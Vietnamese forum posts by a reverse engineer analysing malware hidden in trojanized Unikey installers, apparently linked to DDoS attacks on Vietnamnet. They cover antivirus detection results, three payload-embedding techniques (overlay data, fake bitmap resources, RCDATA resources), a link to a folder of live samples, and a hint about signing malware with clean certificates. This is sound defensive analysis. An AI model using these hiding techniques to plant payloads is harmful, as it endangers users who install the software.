Thật sự là em quá thất vọng về mấy coder của anh em stl quá. Chống lại RCE của em và các anh em khác bằng những kỹ thuật quá ấu trĩ , sơ đẵng, ngây thơ và buồn cười, tệ hết chổ nói, làm em phát bực luôn. Detect AV chỉ một mình AVG thôi sao. Trên thế giới này biết bao nhiêu là AVs. Chống lại DecodeBin.1sc của em chỉ vậy thôi à, 5 phút thôi là em có DecodeBin2.1sc khác ! Lần này lại chơi trò delete file .idb của IDA nữa. Quá tệ, quá sơ đẵng trong suy nghĩ. Nếu em save file .idb ở thư mục khác thì sao ? Đề nghị anh em stl tập dùng IDA đi ? Mình phải hiểu đối thủ thì mới chống lại được chứ. Liệu mấy anh có đủ sức,đủ trình độ anti mọi decompiler, diassembler, mọi tool RCE không ?
Về code và RCE, cả tập thể mấy anh không thể nào chống lại em nổi đâu, không ai là đối thủ của em đâu. Nhớ một điều vậy nhé. Em chỉ là một newbie, một tay mơ, nữa mùa trong giới RCE Vietnam thôi, còn hàng trăm, hàng ngàn cao thủ đích thực khác nữa mà các anh không biết đấy.

Hi hì, biết ngay là các cậu cờ rắc cơ mà dùng Olly là dính ngay chiêu fake của secmask mà !
Chịu khó tìm cho ra đi, không ai chơi patch đâu !

Kết quả quét iTunesHelper.exe với VirusTotal, đã force reanalyze lại:
http://www.virustotal.com/file-scan/report.html?id=aa94d29cbe97b61e9200b52f540dfed24e3f8321de0960824a041141452d34ec-1314858850
Hơn một nữa AV đã tóm cổ em nó.

Để các bạn tìm được link, mail để upload virus, malware, tui xin post link này: http://www.mywot.com/wiki/Malware_submission
Hiện tại tôi cũng theo trang này mà up mẫu thôi, chịu khó đi từ trên xuống dưới.
Không biết có ai ở Vietnamnet đang đọc bài không, có thể cho anh em HVA và mọi người biết tình hình DDOS vào Vietnamnet có giãm đi chưa ! Tôi nghĩ là giãm đáng kể rồi vì hầu hết các AV đã cập nhật iTunesHelper*.exe và kill nó.

RCE = Reverse Code Engineering: kỹ thuật đão ngược, hay dịch ngược. Là một mãng trong RE: Reverse Engineering.
RE gồm rất nhiều mãng con: hardware, firmware, code (software).
Nói nôm na, tháo rời một cái máy ra, xem nó được chế tạo ra sao, lắp ráp và vận hành ra sao cũng là RE, nhưng đây là RE hardware, máy móc. TQ ăn cắp công nghệ máy bay, tàu chiến của nước ngoài, cũng 1 phần dùng RE.
Kinh nghiệm của em: tháo thì dể, nhưng lắp lại cho đúng, không dư bù lon ốc vít, chạy được thì khó. Vì vậy em chọn RE code, software smilie

Tới ngày hôm nay, ngoài Avira hồi báo và cập nhật nhanh nhất, tóm hết 100%, thì lần lượt có các reply sau:
1. Symantec: thất vọng ông này nhất, vẫn dùng hệ thống phân tích tự động, báo về là clean hết.
2. Sophos: Chỉ bắt đám iTunes*.exe và k113.cs, còn trọn bộ IAStor thì clean
3. AVG: cũng như Sophos.
4. Fortinet: cũng như AVG và Sophos
5. Kaspersky: tôi đã post ở trên.
6. MS + McAfee + FSecure....: chưa có kết quả.

Quan trọng nhất theo tôi là Avira, Kaspersky và MS. Vì theo tôi, đây là 3 AV phổ biến nhất ở VN ta, ngoài CMC và BKAV. Windows Defender, MSE thì hầu như máy nào cài Vista hay Win7 đều có, nhưng sợ là bà con không cập nhật hay cập nhật không được vì xxx.
Bà con nào đang dùng Windows Defender, MSE mà không auto update được, nên chịu khó lên homepage của Windows Defender, download bản database update về: http://www.microsoft.com/security/portal/Definitions/ADL.aspx#top

2 thinh191: Cậu up lên mediafire file GoogleCrashHandler.exe đó được không ? Thằng này nhiều biến thể lắm (như AcrobatUpdater.exe vậy).
2 Iwwaty: An tâm, toàn là file PE-64bit hết, stl chưa code "meo que" cho Win64 đâu, ít khán giả lắm !
Kaspersky đã reply cho em:

IAStorCommon.dll,
IAStorDataMgr.dll,
IAStorUIHelper.dll,
iTunesHelper-tray.exe_,
SmartPin.dll,
SysInftLib.dll

No malicious code were found in these files.

IAStorDataMgrSvc.exe- Trojan-Downloader.Win32.Agent.tbhb

New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.

ituneshelper.exe_ - Trojan.Win32.Diple.acxu
k113.css - Backdoor.Win32.Agent.bqwm

.......................
.......................

Regards, Dmitry Kirsanov
Virus Analyst, Kaspersky Lab.

Cái đống dll đi kèm của IAStor nó cứ khăng khăng với em là file sạch. Vậy cũng không sao, vì nếu IAStorDataMgrSvc.exe bị thịt rồi thì cái đống dll đó vô dụng.

Không em, tụi virus writer sau khi compile, build ra file virus, malware thì sẽ dùng tool đó để attach good digital signature vào file virus, malware, không cần chính virus, malware đó được run.

Ừ, cố gắng đừng down các phần mềm crack trôi nổi trên mạng, trên các forum, trên các website chia sẽ file. Biết đâu stl attach "mèo què" vào đấy. Phần mềm càng phổ biến, càng ưa dùng thì càng phải cẩn thận. Cố gắng tìm các phần mềm free, opensource thay thế. Download tại chính trang chủ, cập nhật AV liên tục, dùng các online scanner để quét ngay khi vừa down về.

Check hộ hết thì anh em HVA chết hết, check làm sao nổi.
Các bạn cập nhật AVs của các bạn đi, nên install thêm Avira Free hay update Windows Defender, còn KAV/KIS thì phải mua, lại update chậm chạp hơn nên em không khuyên.
Cứ IDM và Unikey thì remove, uninstall hết. Unikey thì lên trang chủ Unikey.org mà down, còn bỏ luôn IDM đi, thiếu gì các addon download có sẵn cho các trình duyệt các bạn.
Với 010 Editor và Resource Hacker, các bạn có thể tự kiểm tra file Unikey trên máy bạn và down về có phải là Fake Unikey có "bonus" "mèo què" không:

Nếu tiếc thì chịu thôi chứ sao vndncn, quyền của em mà, sống chung với đám bot này cũng không sao, chậm mạng, chậm máy một chút thôi smilie

Chỉ sợ cái đám StaticCaches.dat lấy hết thông tin rồi up lên thôi smilie

Đúng rồi đó LVH. Dùng cert sạch để sign cho file malware. Cậu chịu khó search đi, kỹ thuật này không nên phổ biến rộng rãi. Thật ra năm 2010 tôi đã đọc một article của một nhân viên của Norton về fake digital signature rồi. Tới giờ tụi VX mới public thôi.

Tới nay, tôi đã biết và RCE 3 cách cài cắm malware vào Unikey trôi nổi trên mạng:
1. Dùng overlay data, gắn vào đuôi file fake Unikey: Overlay data này bắt đầu = string "NullsoftInst" mà các bạn đã biết trong post trước. Tôi cũng đã post 010 Editor script để extract và decrypt các malwares đó ra. File DecodeBin.1sc.
2. Dùng các Bmp resource giả nhúng vào resource của file fake Unikey: Cách mà MSHelpCenter.exe được sinh ra. Các bitmap resource này có tên sau:
- Background10311
- Pattern2066
- Pattern5230
- Background10252
- Pattern1034
3. Cũng dùng resource, nhưng nhúng vào RCDATA, với name 1, 2, 3, 4, 5, 6. Đây là fake Unikey64 mà cậu chieutuongtu đang dính. 010 Editor script để giãi mã cho đám này tôi cũng đã post lên, file DecodeRes.1sc.

Các 010 Editor script đó nằm trong file zip DecodeSTLVirus.zip mà tôi đã up ở Mediafire.

Để khảo sát resource của 1 EXE, DLL... (nói chung là PE file), các bạn có thể down và dùng tool này: Resource Hacker, free, good http://angusj.com/resourcehacker/

BackupSvc.* và MSHelpCenter.* đều được sinh ra từ 3 cách này. Trong thư mục STLVirus mà tui đã up lên Mediafire: http://www.mediafire.com/#tz745o0f678w8, các bạn sẽ thấy 3 file fake Unikey này.

Python giờ gần như là ngôn ngữ bắt buộc cho giới RCE, security, network, forensics.